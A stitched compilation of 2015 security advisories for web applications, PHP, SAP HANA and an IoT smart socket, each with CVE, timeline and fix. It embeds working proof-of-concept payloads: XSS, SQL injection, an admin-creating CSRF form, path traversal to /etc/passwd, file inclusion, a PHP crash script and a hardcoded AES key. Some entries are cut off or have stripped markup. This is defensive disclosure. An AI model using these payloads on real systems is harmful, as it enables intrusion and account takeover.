mp_b5e6ddf58b2d02245a7a19005d1cec48_mixpanel=%7B%22distinct_id%22%3A%20%2214d5bb8613c39-02d2d6f80b48dc8-44564136-1fa400-14d5bb8613d828%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2F192.168.189.133%3A8000%2F%22%2C%22%24initial_referring_domain%22%3A%20%22192.168.189.133%3A8000%22%7D; PHPSESSID=12345 --- Solution: Update to Vesta Control Panel 0.9.8-14 More Information: http://vestacp.com/roadmap/#history --- References: [1] High-Tech Bridge Advisory HTB23261 - https://www.htbridge.com/advisory/HTB23261 - OS Command Injection in Vesta Control Panel. [2] Vesta Control Panel - http://vestacp.com - Open Source web hosting control panel with premium features, secure, advanced and minimalistic design [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Reflected Cross-Site Scripting (XSS) in SearchBlox
Advisory ID: HTB23256 Product: SearchBlox Vendor: SearchBlox Software, Inc. Vulnerable Version(s): 8.2 and probably prior Tested Version: 8.2 Advisory Publication: April 22, 2015 [without technical details] Vendor Notification: April 22, 2015 Vendor Patch: May 26, 2015 Public Disclosure: June 17, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2015-3422 Risk Level: Low CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered XSS vulnerability in SearchBlox, which can be exploited to perform Cross-Site Scripting attacks against the vulnerable web application administrators. Input passed via the menu2 HTTP GET parameter to /searchblox/admin/main.jsp script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and scripting code in his browser in context of the vulnerable website. A simple XSS exploit below uses the alert() JS function to display a box with ImmuniWeb word: http://[host]/searchblox/admin/main.jsp?menu1=admmenu2=%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E --- Solution: Update to SearchBlox 8.2.1 --- References: [1] High-Tech Bridge Advisory HTB23256 - https://www.htbridge.com/advisory/HTB23256 - Reflected Cross-Site Scripting (XSS) in SearchBlox. [2] SearchBlox - http://www.searchblox.com - SearchBlox is an Enterprise Search amp; Analytics solution build on Apache Lucene amp; Elasticsearch. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Multiple Vulnerabilities in ISPConfig
Advisory ID: HTB23260
Product: ISPConfig
Vendor: http://www.ispconfig.org
Vulnerable Version(s): 3.0.5.4p6 and probably prior
Tested Version: 3.0.5.4p6
Advisory Publication: May 20, 2015 [without technical details]
Vendor Notification: May 20, 2015
Vendor Patch: June 4, 2015
Public Disclosure: June 10, 2015
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2015-4118, CVE-2015-4119
Risk Level: High
CVSSv2 Base Scores: 5.8 (AV:N/AC:L/Au:M/C:P/I:P/A:P), 7.6
(AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab (
https://www.htbridge.com/advisory/ )
---
Advisory Details:
High-Tech Bridge Security Research Lab discovered two vulnerabilities in a
popular hosting control panel ISPConfig. The vulnerabilities can be exploited
to execute arbitrary SQL commands in application database, perform a CSRF
attack and gain complete control over the web application.
1) SQL Injection in ISPConfig: CVE-2015-4118
The vulnerability exists due to insufficient filtration of input data passed
via the server HTTP GET parameter to /monitor/show_sys_state.php script
before executing a SQL query. A remote authenticated attacker can pass
arbitrary SQL commands to the vulnerable script and execute them in
application’s database.
Successful exploitation of this vulnerability will allow an attacker to read,
insert and modify arbitrary records in database and compromise the entire web
application, but requires the attacker to be authenticated and to have
monitor privileges. However, in combination with the CSRF vulnerability to
which the application is also vulnerable, this vulnerability becomes
exploitable by remote non-authenticated attacker.
A simple exploit below will display MySQL server version. First, use the
following HTTP request to execute the SQL query:
https://[host]/monitor/show_sys_state.php?state=serverserver=-1%20UNION%20SELECT%201,version%28%29%20--%202|-
After that visit the page mentioned below, the result of MySQL 'version()'
function will be displayed in the HTML code of the page:
https://[host]/monitor/show_data.php?type=mem_usage
2) CSRF (Cross-Site Request Forgery) in ISPConfig: CVE-2015-4119
The vulnerability exists due to failure in the /admin/users_edit.php script
to properly verify the origin of the HTTP request. A remote attacker can create
a specially crafted web page with CSRF exploit, trick a logged-in administrator
to visit this page and create a new user with administrative privileges.
A simple CSRF exploit below creates an administrative account with username
immuniweb and password immuniweb:
form action = https://[host]/admin/users_edit.php; method = POST enctype =
multipart/form-data
input type=hidden name=username value=immuniweb
input type=hidden name=passwort value=immuniweb
input type=hidden name=repeat_password value=immuniweb
input type=hidden name=modules[] value=vm
input type=hidden name=modules[] value=mail
input type=hidden name=modules[] value=help
input type=hidden name=modules[] value=monitor
input type=hidden name=startmodule value=vm
input type=hidden name=app_theme[] value=default
input type=hidden name=typ[] value=admin
input type=hidden name=active value=1
input type=hidden name=language value=en
input type=submit id=btn
/form
script
document.getElementById('btn').click();
/script
---
Solution:
Update to ISPConfig 3.0.5.4p7
More Information:
http://bugtracker.ispconfig.org/index.php?do=detailstask_id=3898
---
References:
[1] High-Tech Bridge Advisory HTB23260 -
https://www.htbridge.com/advisory/HTB23260 - Multiple vulnerabilities in
ISPConfig.
[2] ISPConfig - http://www.ispconfig.org - Hosting Control Panel Software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ -
international in scope and free for public use, CVE® is a dictionary of
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to
developers and security practitioners, CWE is a formal list of software
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual
web application penetration test and cutting-edge vulnerability scanner
available online via a Software-as-a-Service (SaaS) model.
---
Disclaimer: The information provided in this Advisory is provided as is and
without any warranty of any kind. Details of this Advisory may be updated in
order to provide as accurate information as possible. The latest version of the
Advisory
Arbitrary File Disclosure and Open Redirect in Bonita BPM
Advisory ID: HTB23259 Product: Bonita BPM Vendor: Bonitasoft Vulnerable Version(s): 6.5.1 and probably prior Tested Version: 6.5.1 (Windows and Mac OS packages) Advisory Publication: May 7, 2015 [without technical details] Vendor Notification: May 7, 2015 Vendor Patch: June 9, 2015 Public Disclosure: June 10, 2015 Vulnerability Type: Path Traversal [CWE-22], Open Redirect [CWE-601] CVE References: CVE-2015-3897, CVE-2015-3898 Risk Level: High CVSSv2 Base Scores: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab two vulnerabilities in Bonita BPM Portal (Bonita's web interface running by default on port 8080), which can be exploited by remote non-authenticated attacker to compromise the vulnerable web application and the web server on which it is hosted. 1) Path Traversal in Bonita BPM Portal: CVE-2015-3897 User-supplied input passed via the theme and location HTTP GET parameters to bonita/portal/themeResource URL is not properly verified before being used as part of file name. The attacker may download any system file accessible to the web server user. Simple PoC code below will return content of C:/Windows/system.ini file: http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../location=Windows/system.ini Second PoC will disclose the content of /etc/passwd file: http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../location=etc/passwd 2) Open Redirect in Bonita BPM Portal: CVE-2015-3898 Input passed via the redirectUrl HTTP GET parameter to /bonita/login.jsp script and /bonita/loginservice URLs is not properly verified before being used as redirect URL. After login user may be redirected to arbitrary website: http://[HOST]/bonita/login.jsp?_l=enredirectUrl=//immuniweb.com/ --- Solution: Update to Bonita BPM 6.5.3 More Information: http://community.bonitasoft.com/blog/bonita-bpm-653-available --- References: [1] High-Tech Bridge Advisory HTB23259 - https://www.htbridge.com/advisory/HTB23259 - Arbitrary File Disclosure and Open Redirect in Bonita BPM. [2] Bonita BPM - http://www.bonitasoft.com/ - Bonita BPM for business process applications - the BPM platform that gives developers freedom to create and manage highly customizable business apps. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Use-After-Free in PHP
Advisory ID: HTB23262
Product: PHP
Vendor: PHP Group
Vulnerable Version(s): 5.6.9 and probably prior
Tested Version: 5.6.9
Advisory Publication: May 20, 2015 [without technical details]
Vendor Notification: May 20, 2015
Vendor Patch: June 2, 2015
Public Disclosure: June 10, 2015
Vulnerability Type: Use After Free [CWE-416]
Risk Level: Medium
CVSSv2 Base Score: 4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab (
https://www.htbridge.com/advisory/ )
---
Advisory Details:
High-Tech Bridge Security Research Lab discovered use-after-free vulnerability
in a popular programming language PHP, which can be exploited to cause crash
and possibly execute arbitrary code on the target system.
The vulnerability resides within the 'spl_heap_object_free_storage()' PHP
function when trying to dereference already freed memory. A local attacker can
cause segmentation fault or possibly execute arbitrary code on the target
system with privileges of webserver.
Below is a simple code that will trigger a crash:
?php
class SplMinHeap1 extends SplMinHeap {
public function compare($a, $b) {
return -parent::notexist($a, $b);
}
}
$h = new SplMinHeap1();
$h-insert(1);
$h-insert(6);
$h-insert(5);
$h-insert(2);
?
Running the following PoC we get:
gdb-peda$ r ~/Desktop/heap_uaf.php
Starting program: /usr/local/bin/php ~/Desktop/heap_uaf.php
PHP Fatal error: Call to undefined method SplMinHeap::notexist() in
/home/test/Desktop/heap_uaf.php on line 4
Fatal error: Call to undefined method SplMinHeap::notexist() in
/home/test/Desktop/heap_uaf.php on line 4
Program received signal SIGSEGV, Segmentation fault.
[--registers---]
RAX: 0x5a5a5a5a5a5a5a5a ()
RBX: 0x800
RCX: 0xcd0458 (/home/test/De...)
RDX: 0x16f
RSI: 0xcd0458 (/home/test/De...)
RDI: 0x5a5a5a5a5a5a5a5a ()
RBP: 0x7fffc570 -- 0x7fffc5a0 -- 0x7fffc5d0 -- 0x7fffc600
-- 0x7fffc630 -- 0x7fffc750 -- 0x7fffc850 -- 0x7fffc9b0 --
0x7fffdcf0 -- 0x7fffde50 -- 0x0
RSP: 0x7fffc570 -- 0x7fffc5a0 -- 0x7fffc5d0 -- 0x7fffc600
-- 0x7fffc630 -- 0x7fffc750 -- 0x7fffc850 -- 0x7fffc9b0 --
0x7fffdcf0 -- 0x7fffde50 -- 0x0
RIP: 0x82a96f (zval_delref_p+12: moveax,DWORD PTR [rax+0x10])
R8 : 0x269
R9 : 0x0
R10: 0x7fff9b20 -- 0x0
R11: 0x771102f0 -- 0xfffda6c0fffda3ef
R12: 0x4209e0 (_start:xorebp,ebp)
R13: 0x7fffdf30 -- 0x2
R14: 0x0
R15: 0x0
[-code-]
0x82a964 zval_delref_p+1: movrbp,rsp
0x82a967 zval_delref_p+4: movQWORD PTR [rbp-0x8],rdi
0x82a96b zval_delref_p+8: movrax,QWORD PTR [rbp-0x8]
= 0x82a96f zval_delref_p+12: moveax,DWORD PTR [rax+0x10]
0x82a972 zval_delref_p+15: leaedx,[rax-0x1]
0x82a975 zval_delref_p+18: movrax,QWORD PTR [rbp-0x8]
0x82a979 zval_delref_p+22: movDWORD PTR [rax+0x10],edx
0x82a97c zval_delref_p+25: movrax,QWORD PTR [rbp-0x8]
[stack-]
As seen above when trying to dereference the value from $rax (which has been
already freed) PHP crashes.
Stopped reason: SIGSEGV
0x0082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at
/home/test/Desktop/php-5.6.9/Zend/zend.h:411
411 return --pz-refcount__gc;
Running the backtrace command we can see a couple of freed variables: zval_ptr,
pz
gdb-peda$ bt
#0 0x0082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at
/home/test/Desktop/php-5.6.9/Zend/zend.h:411
#1 0x0082aafb in i_zval_ptr_dtor (zval_ptr=0x5a5a5a5a5a5a5a5a,
__zend_filename=0xcd0458 /home/test/De..., __zend_lineno=0x16f) at
/home/test/Desktop/php-5.6.9/Zend/zend_execute.h:76
#2 0x0082bdcb in _zval_ptr_dtor (zval_ptr=0x77fcba88,
__zend_filename=0xcd0458 /home/test/De..., __zend_lineno=0x16f) at
/home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:424
#3 0x006e5c1a in spl_heap_object_free_storage (object=0x77dfdfa0)
at /home/test/Desktop/php-5.6.9/ext/spl/spl_heap.c:367
#4 0x0087f566 in zend_objects_store_free_object_storage
(objects=0x102e640 executor_globals+928) at
/home/test/Desktop/php-5.6.9/Zend/zend_objects_API.c:97
#5 0x0082b89e in shutdown_executor () at
/home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:290
#6 0x00841a4c in zend_deactivate () at
/home/test/Desktop/php-5.6.9/Zend/zend.c:960
#7 0x007a7c40 in php_request_shutdown (dummy
Hardcoded AES 256 bit key used in Kankun IoT/Smart socket and its mobile App
Hi List,
Vulnerability
=
Hardcoded AES 256 bit key used in Kankun IoT/Smart socket and its mobile App
Vulnerability Description
==
The kankun smart socket device and the mobile app use a hardcoded AES
256 bit key to encrypt the commands and responses between the device
and the app. The communication happens over UDP. An attacker on the
local network can use the same key to encrypt and send unsolicited
commands to the device and hijack it.
CVE ID
CVE-2015-4080
Vendor
www.ikonke.com
Product
=
Kankun Smart Socket
Disclosure Timeline
1. 25 May 2015 – Reported to Vendor, no response.
2. 29 May 2015 – Reminder sent to vendor, no response.
3. 5 June 2015 – Public disclosure.
Credits
=
1. Aseem Jakhar, Director - Research, Payatu Technologies Pvt. Ltd.
2. Since at the time of publishing the finding, we searched online for
the same and found that someone else had also published the key. In
good faith we would like to mention the same person who goes by the
handle: kankun hacker -
https://plus.google.com/109112844319840106704/posts although both the
research were independent of each other and we do not know who kankun
hacker is.
About Payatu
Payatu Technologies is a boutique security testing company. We
specialize in Mobile/IoT/Product/Application security testing.
PoC exploit source code
https://bitbucket.org/aseemjakhar/kcmd
Technical details
==
We performed our analysis on the Android App and the device. The user
manual specifies the app to be used for the device -
http://kk.huafeng.com:8081/none/android/smartwifi.apk The smart socket
has a newer version on the app on google play store which is also
vulnerable - https://play.google.com/store/apps/details?id=hangzhou.zx
Communication
--
The communication between the app and the device happens over UDP.
The commands are Broadcasted on the network to UDP destination port 27431
App Reversing
- We decompiled the app using using apktool
- The app has a native shared library libNDK_03.so which contains the
encryption logic and the hard-coded key
- We analysed the app and got an idea of the command/response protocol
being used between the app and the device.
- The Java code uses JNI functions to encrypt and decrypt the commands
and responses. The functions are encode() and decode(). Interestingly
there is also a function called add() which adds the two parameters
and returns the result. This must definitely be a testing function
used while starting to develop the library :).
- The command and response for switching ON and OFF is a 4 step process
- Step 1 - App sends an Open/Close request (Open means Switch ON,
close means Switch OFF)
- Step 2 - Device sends a response containing a confirmation ID (a number)
- Step 3 - App sends the confirmation request along with the
confirmation ID received from the Device
- Step 4 - Device sends an Acknowledgement and Switches the device ON/OFF
- An example of the communication protocol to Switch ON the device,
assuming the MAC address of the device is “de:ad:de:ad:de:ad”, the
password set by the user is “secretpass” and the confirmation ID is
70018. If the user does not set any encryption password the string
“nopassword” is used.
APP -- lan_phone%de:ad:de:ad:de:ad%secretpass%open%request -- Device
DEVICE -- lan_device%de:ad:de:ad:de:ad%secretpass%confirm#70018%rack -- APP
APP -- lan_phone%de:ad:de:ad:de:ad%secretpass%confirm#70018%request
-- DEVICE
DEVICE -- lan_device%de:ad:de:ad:de:ad%secretpass%open%rack -- APP
- As you can see above, the communication is a simple string where
fields are separated by the % character. The fields are self
explanatory. There is also an option of wan_phone and wan_device which
we did not test.
- A quick strings output showed up the key along with other strings.
This particular string looked a little intersting and we started
reversing the native library.
- Output of $ strings libNDK_03.so
UUPx((
Zw--
fdsl;mewrjope456fds4fbvfnjwaugfo
java/lang/String
- The installed library is not stripped
- In the library the JNI encode/decode functions call
EncryptData/DecryptData respectively
3990 Java_hangzhou_kankun_WifiJniC_encode:
3990: b5f0push{r4, r5, r6, r7, lr}
3992: b085sub sp, #20
3994: 1c11addsr1, r2, #0
39b6: 2380movsr3, #128; 0x80
39b8: f7ff ff0e bl 37d8 EncryptData
- The EncryptData() internally calls aes functions which means it is
using AES encryption
37d8 EncryptData:
37d8: b5f0push{r4, r5, r6, r7, lr}
37da: 465fmov r7, fp
37dc: 4656mov r6, sl
3868: 9001str r0, [sp, #4]
386a: f7fd fb8b bl
Local PHP File Inclusion in ResourceSpace
Advisory ID: HTB23258 Product: ResourceSpace Vendor: Montala Limited Vulnerable Version(s): 7.1.6513 and probably prior Tested Version: 7.1.6513 Advisory Publication: May 6, 2015 [without technical details] Vendor Notification: May 6, 2015 Vendor Patch: June 1, 2015 Public Disclosure: June 3, 2015 Vulnerability Type: PHP File Inclusion [CWE-98] CVE Reference: CVE-2015-3648 Risk Level: High CVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in ResourceSpace, which can be exploited to include arbitrary local PHP file, execute PHP code, and compromise vulnerable web application and even entire web server on which the application is hosted. The vulnerability exists due to the absence of filtration of the defaultlanguage HTTP GET parameter received from the user before including PHP file using the include() PHP function in /pages/setup.php script. The installation script /pages/setup.php remains on the system after installation by default and is remotely accessible to non-authenticated users. A simple PoC below includes a local file /tmp/file.php: http://[host]/pages/setup.php?defaultlanguage=../../../../../tmp/file --- Solution: Update to ResourceSpace 7.2.6727 More Information: http://svn.montala.com/websvn/revision.php?repname=ResourceSpacepath=%2Frev=6640peg=6738 --- References: [1] High-Tech Bridge Advisory HTB23258 - https://www.htbridge.com/advisory/HTB23258 - Local PHP File Inclusion in ResourceSpace. [2] ResourceSpace - http://resourcespace.org - ResourceSpace open source digital asset management software is the simple, fast, amp; free way to organise your digital assets. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
[Onapsis Security Advisory 2015-007] SAP HANA Log Injection Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security AdvisoryONAPSIS-2015-007: SAP HANA Log Injection Vulnerability 1. Impact on Business = Under certain conditions the SAP HANA XS engine is vulnerable to arbitrary log injection, allowing remote authenticated attackers to write arbitrary information in log files. This could be used to corrupt log files or add fake content misleading an administrator. Risk Level: Medium 2. Advisory Information === - - Public Release Date: 2015-05-27 - - Subscriber Notification Date: 2015-05-27 - - Last Revised: 2015-05-27 - - Security Advisory ID: ONAPSIS-2015-007 - - Onapsis SVS ID: ONAPSIS-00140 - - CVE: CVE-2015-3994 - - Researcher: Fernando Russ, Nahuel D. Sánchez - - Initial Base CVSS v2: 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N) 3. Vulnerability Information - - Vendor: SAP A.G. - - Affected Components: SAP HANA DB 1.00.73.00.389160 (NewDB100_REL) - - Vulnerability Class: Improper Output Neutralization for Logs (CWE-117) - - Remotely Exploitable: Yes - - Locally Exploitable: No - - Authentication Required: Yes - - Original Advisory: http://www.onapsis.com/research/security-advisories/SAP-HANA-log-injection-vulnerability-in-extended-application-services 4. Affected Components Description == SAP HANA is a platform for real-time business. It combines database, data processing, and application platform capabilities in-memory. The platform provides libraries for predictive, planning, text processing, spatial, and business analytics. 5. Vulnerability Details Under certain conditions a remote authenticated attacker can inject log lines performing specially crafted HTTP requests to the vulnerable SAP HANA XS Engine. The vulnerable application is “grant.xsfunc”, located under: /testApps/grantAccess/grant.xscfunc 6. Solution === Implement SAP Security Note 2109818 7. Report Timeline == 2014-10-03: Onapsis provides vulnerability information to SAP AG. 2014-11-07: Onapsis provides additional information about the vulnerability to SAP AG. 2015-01-26: Onapsis provides additional information about the vulnerability to SAP AG. 2015-02-10: SAP AG publishes security note 2109818 which fixes the problem. 2015-05-27: Onapsis publishes security advisory. Organizations depend on Onapsis because of our ability to provide reliable expertise and solutions for securing business essentials About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Onapsis Research Team iEYEARECAAYFAlVmDLIACgkQz3i6WNVBcDUR4ACeK/opClwvxRdiTBODTGzuNT3T mfQAoMb54pvOSeCMqeMjKokdsN/i8GNL =JXst -END PGP SIGNATURE-
[Onapsis Security Advisory 2015-006] SAP HANA Information Disclosure via SQL IMPORT FROM statement
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory ONAPSIS-2015-006: SAP HANA Information Disclosure via SQL IMPORT FROM statement 1. Impact on Business = Under certain conditions some SAP HANA Database commands could be abused by a remote authenticated attacker to access information which is restricted. This could be used to gain access to confidential information. Risk Level: Medium 2. Advisory Information === - - Public Release Date: 2015-05-27 - - Subscriber Notification Date: 2015-05-27 - - Last Revised: 2015-05-27 - - Security Advisory ID: ONAPSIS-2015006 - - Onapsis SVS ID: ONAPSIS-00142 - - CVE: CVE-2015-3995 - - Researcher: Sergio Abraham, Fernando Russ, Nahuel D. Sánchez - - Initial Base CVSS v2: 4 (AV:N/AC:L/Au:S/C:P/I:N/A:N) 3. Vulnerability Information - - Vendor: SAP A.G. - - Affected Components: SAP HANA DB 1.00.73.00.389160 (NewDB100_REL) - - Vulnerability Class: Improper Access Control (CWE-284) - - Remotely Exploitable: Yes - - Locally Exploitable: No - - Authentication Required: Yes - - Original Advisory: http://www.onapsis.com/research/security-advisories/SAP-HANA-information - -disclosure-via-SQL-import-from-statement 4. Affected Components Description == SAP HANA is a platform for real-time business. It combines database, data processing, and application platform capabilities in-memory. The platform provides libraries for predictive, planning, text processing, spatial, and business analytics. 5. Vulnerability Details A remote authenticated attacker, could access confidential information using specially crafted SQL statement which leads him to read arbitrary files from the OS through the database command READ FILE IMPORT available to be performed inside any SQL query. 6. Solution === Implement SAP Security Note 2109565 7. Report Timeline == 2014-10-18: Onapsis provides vulnerability information to SAP AG. 2014-10-19: SAP AG confirms having the information about the vulnerability. 2015-01-13: SAP AG publishes security note 2109565 which fixes the problem. 2015-05-27: Onapsis publishes security advisory. About Onapsis Research Labs === Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Onapsis Research Team iEYEARECAAYFAlVmDKgACgkQz3i6WNVBcDV+XgCeKE+ulvXCD/nuU4YshckzsSVd 6VsAoIAI/HV7lNQ+KyL52ssSBe2D+Zln =/P7V -END PGP SIGNATURE-
Stored XSS in WP Photo Album Plus WordPress Plugin
Advisory ID: HTB23257 Product: WP Photo Album Plus WordPress Plugin Vendor: J.N. Breetvelt Vulnerable Version(s): 6.1.2 and probably prior Tested Version: 6.1.2 Advisory Publication: April 29, 2015 [without technical details] Vendor Notification: April 29, 2015 Vendor Patch: April 29, 2015 Public Disclosure: May 20, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2015-3647 Risk Level: Medium CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered stored XSS vulnerability in WP Photo Album Plus WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of vulnerable WordPress installation. An attacker might be able to hijack administrator’s session and obtain full control over the vulnerable website. The vulnerability exists due to the absence of filtration of user-supplied input passed via the comname and comemail HTTP POST parameters to /wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php script when posting a comment. A remote attacker can post a specially crafted message containing malicious HTML or script code and execute it in administrator’s browser in context of the vulnerable website, when administrator views images or comments in administrative interface. A simple exploit below will store JS code in the WP database and display a JS popup window with ImmuniWeb word every time the administrator views comments or images: form action=http://[host]/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php; method=post name=main input type=hidden name=action value='wppa' input type=hidden name=wppa-action value='do-comment' input type=hidden name=photo-id value='2' input type=hidden name=comment value='1' input type=hidden name=moccur value='1' input type=hidden name=comemail value='scriptalert(/ImmuniWeb/);/script' input type=hidden name=comname value='scriptalert(/ImmuniWeb/);/script' input type=submit id=btn /form The code will be automatically executed, when the administrator visits one of the following pages: http://[host]/wp-admin/admin.php?page=wppa_manage_comments http://[host]/wp-admin/admin.php?page=wppa_moderate_photos --- Solution: Update to WP Photo Album Plus 6.1.3 More Information: https://wordpress.org/plugins/wp-photo-album-plus/changelog/ --- References: [1] High-Tech Bridge Advisory HTB23257 - https://www.htbridge.com/advisory/HTB23257 - Stored Cross-Site Scripting (XSS) in WP Photo Album Plus WordPress Plugin. [2] WP Photo Album Plus WordPress plugin - https://wordpress.org/plugins/wp-photo-album-plus/ - This plugin is designed to easily manage and display your photos, photo albums, slideshows and videos in a single as well as in a network WP site. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. --- Disclaimer: The information provided in this Advisory is provided as is and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Arbitrary Variable Overwrite in eShop WordPress Plugin
Advisory ID: HTB23255 Product: eShop WordPress plugin Vendor: Rich Pedley Vulnerable Version(s): 6.3.11 and probably prior Tested Version: 6.3.11 Advisory Publication: April 15, 2015 [without technical details] Vendor Notification: April 15, 2015 Public Disclosure: May 6, 2015 Vulnerability Type: Code Injection [CWE-94] CVE Reference: CVE-2015-3421 Risk Level: Medium CVSSv2 Base Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) --- Advisory Details: High-Tech Bridge Security Research Lab discovered security vulnerability in eShop WordPress Plugin, which can be exploited by remote attacker to overwrite arbitrary PHP variables within the context of the vulnerable application. The vulnerability exists due to insufficient validation of user-supplied input in eshopcart HTTP cookie. Successful exploitation of this vulnerability may potentially result in arbitrary PHP code execution (RCE). Often such type of vulnerabilities lead to RCE, however in this case we can only overwrite string variables within the scope of 'eshop_checkout()' function in '/wp-content/plugins/eshop/checkout.php' file. This reduces our current vectors of exploitation to Full Path Disclosure and Cross-Site Scripting. Below is a simple PoC that overwrites contents of the wpdb PHP variable, which causes an error in code and discloses full installation path: GET /shopping-cart-2/checkout/ HTTP/1.1 Cookie: eshopcart=wpdb%3d1%7C; Another PoC triggers the XSS vector and executes JS pop-up box displaying ImmuniWeb: GET /shopping-cart-2/checkout/ HTTP/1.1 Cookie: eshopcart=phone%3dsdfg'scriptalert(/ImmuniWeb/)/script --- Solution: Disclosure timeline: 2015-04-15 Vendor Alerted via contact form and thread in support forum, no reply. 2015-04-29 Vendor Alerted via contact form and emails, no reply. 2015-05-05 Fix 